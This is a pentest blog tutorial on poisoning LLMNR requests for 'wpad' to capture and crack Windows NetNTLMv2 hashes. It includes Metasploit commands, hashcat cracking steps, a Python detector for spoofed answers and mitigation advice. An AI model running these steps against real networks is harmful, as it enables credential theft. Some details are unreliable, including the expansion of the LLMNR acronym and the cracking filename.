A while back my colleague Pedro wrote an article showing a technique that is really useful once you've gained access to a network: the salmon fishing bear attack.
In essence this listens to NetBIOS broadcasts, spoofs the requested name and then connects back to wherever you want it. Where this becomes useful is if you can get the host to request a web page: you can then set up a server requiring NT authentication and Windows will try to authenticate, all while the user is unaware of it happening.
I recently had to revisit this technique where NetBIOS wasn't enabled. This makes it harder, but it's still possible to use the same kind of attack using a different name service method, one called LLMNR, which has been implemented in Windows from Windows 7 onwards.
What is LLMNR?
It sounds like a bacterial resistant illness, doesn't it? It's short for Local Loop Multicast Name Resolution. "Yes, but what's it for, Dave?" I hear you ask. It's a lightweight name service that works by using a multicast group to query and resolve basic names within a small(ish) network area. Its big advantage is that it works well for both IPv4 and IPv6, and it looks like this (excuse the redaction bars):
The attentive among you will have noticed that the request above is for IPv6, asking for a resolution from ff02::1:3; for IPv4 the request is sent to 224.0.0.252. As it is multicast, it goes out to the network (usually just the local segment).
Windows knows this as "Network Discovery", which can be changed in the Network and Sharing Center's advanced sharing settings:
Abusing it
The protocol has the same basic problem as the NetBIOS name service: it's a name request that is sent to all clients on the network, not to a specific server. That means the client will implicitly trust any reply it sees.
So what we do is listen for requests for a hostname and redirect them to a server under our control. When the client connects we ask for authentication, and Windows nicely provides us with its credentials.
We can abuse the Internet Explorer automatic proxy facility for this: when you start Internet Explorer and it is set to use an automatic proxy, it will send out a request for a host called "wpad", then connect to that host and pull down a file called wpad.dat. If you're really curious, Wikipedia describes it in much better detail than I do.
When Windows 7+ requests wpad it will send out requests via:
- DNS (unicast for wpad)
- NetBIOS (broadcast for WPAD)
- LLMNR (multicast for wpad)
So, we answer with our server, set up a quick web server and require NT authentication. Then we sit back and wait for credentials.
That's quite a wall of text, so let's show this in a Wireshark screenshot (with redaction bars):
Here we see the LLMNR requests for both IPv4 (the A record) and IPv6 (the AAAA record), and the full process of the client trying to get wpad.dat and trying to authenticate.
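As an added example (not part of the original post), here is a small Python parser for LLMNR messages, with a check that flags any LLMNR answer for "wpad": a real WPAD host is resolved over DNS, so an LLMNR answer for that name is the poisoning described above in action. The sample packets are constructed, and the parser is what you would run over UDP 5355 traffic captured on the multicast groups mentioned above.

```python
import ipaddress
import struct

TYPE_A, TYPE_AAAA = 1, 28   # LLMNR rides on UDP 5355 to 224.0.0.252 / ff02::1:3

def _read_name(data, off):  # DNS-style name, with compression-pointer support
    labels, end, hops = [], None, 0
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:                      # 2-byte pointer into the message
            hops += 1
            if hops > 8: raise ValueError("compression pointer loop")
            if end is None: end = off + 2              # resume after the first pointer
            off = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0: break
        labels.append(data[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (off if end is None else end)

def parse_llmnr(data):  # wire format is DNS-like (RFC 4795): header, questions, answers
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = _read_name(data, off)
        qtype = struct.unpack("!H", data[off:off + 2])[0]
        off += 4                                       # QTYPE + QCLASS
        questions.append((name, qtype))
    for _ in range(an):
        name, off = _read_name(data, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata, off = data[off:off + rdlen], off + rdlen
        addr = str(ipaddress.ip_address(rdata)) if rtype in (TYPE_A, TYPE_AAAA) else None
        answers.append((name, rtype, ttl, addr))
    return {"id": txid, "is_response": bool(flags & 0x8000), "questions": questions, "answers": answers}

def spoof_alerts(msg, src_ip, sensitive=("wpad",)):
    # A legitimate wpad host is resolved via DNS; an LLMNR answer for it is the poisoning in action
    if not msg["is_response"]: return []
    return [f"{src_ip} answered LLMNR for '{name}' with {addr}"
            for name, _, _, addr in msg["answers"] if name.lower() in sensitive]

# Constructed samples, not captures: a wpad AAAA query, and a response pointing wpad at 192.168.0.100
SAMPLE_QUERY = b"\x56\x78\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x04wpad\x00\x00\x1c\x00\x01"
SAMPLE_RESPONSE = (b"\x12\x34\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00\x04wpad\x00\x00\x01\x00\x01"  # hdr + Q
                   b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x1e\x00\x04\xc0\xa8\x00\x64")  # answer: A, TTL 30
```

Feed `spoof_alerts` the parsed message and the UDP source address of each response; any hit on a segment where LLMNR is supposed to be off is worth an incident ticket.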
Setting it up
Just like with NetBIOS, we're going to use Metasploit for this. It's a bit more complicated than most Metasploit exploits as we need to run two auxiliary modules.
First off we need to set up the target web server that's going to gather the password hashes, using auxiliary/server/capture/http_ntlm:
msf > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set johnpwfile /root/out.txt
johnpwfile => /root/out.txt
msf auxiliary(http_ntlm) > set srvhost 192.168.0.100
srvhost => 192.168.0.100
msf auxiliary(http_ntlm) > set srvport 80
srvport => 80
msf auxiliary(http_ntlm) > exploit
[*] Auxiliary module execution completed
[*] Using URL: http://192.168.0.100:80/AuGOLjaEu2L1VE
[*] Server started.
This just starts up a simple web server that will listen at the URL, present an NT authentication challenge and store whatever hashes it receives. (NT authentication is a three-step challenge-response process.)
We can look at it from a normal web browser; it isn't exciting, as this is never meant to be seen by human eyes:
So we now need something to actually talk to the web server, the magic bit if you like. For this we use Metasploit's auxiliary/spoof/llmnr/llmnr_response module:
msf auxiliary(http_ntlm) > use auxiliary/spoof/llmnr/llmnr_response
msf auxiliary(llmnr_response) > set interface eth2
interface => eth2
msf auxiliary(llmnr_response) > set spoofip 192.168.0.100
spoofip => 192.168.0.100
msf auxiliary(llmnr_response) > set regex wpad
regex => wpad
msf auxiliary(llmnr_response) > exploit
[*] Auxiliary module execution completed
[*] LLMNR Spoofer started. Listening for LLMNR requests with REGEX "(?-mix:wpad)" ...
Here we are creating a multicast listener which will listen for LLMNR requests for "wpad" and respond with the IP address of the web server we created (above).
Getting the passwords
Now, leave that running, particularly at a time when lots of people are loading Internet Explorer and therefore will be looking for the wpad file (lunchtimes and mid-mornings work brilliantly for this), and you will end up with an output file filled with NT authentication challenges.
The next step is to crack them. This can be done with John the Ripper's jumbo patch or, if you have a fast graphics card, with hashcat.
The first step is to filter out machine accounts. A machine account is the NT account that a computer uses to authenticate with the domain. These are easily recognisable as they end with a '$', e.g. ASPHODEL$. These can quickly be grepped out:
grep -v '$:' out.txt > filtered.txt
Now we can use hash type 5600 (NetNTLMv2) to crack them in hashcat:
c:\tools\passwords\hashcat>cudahashcat64 -m 5600 out.txt --remove --session llmnr ..\dictionaries
Preventing it
The easiest way to get rid of this vector is to stop Windows using LLMNR. This has to be set for each network profile and can be done through the Control Panel by going to:
Network and Sharing Center > Change Advanced Sharing Settings > profile > Network discovery
...and setting the radio button to "Turn off network discovery".
This can also be disabled through group policy by altering the settings in:
Administrative Templates > Network > Link-Layer Topology Discovery
Whilst you're altering this, you may want to consider disabling automatic proxy configuration as well, forcing the proxy setting to go only to a specific destination.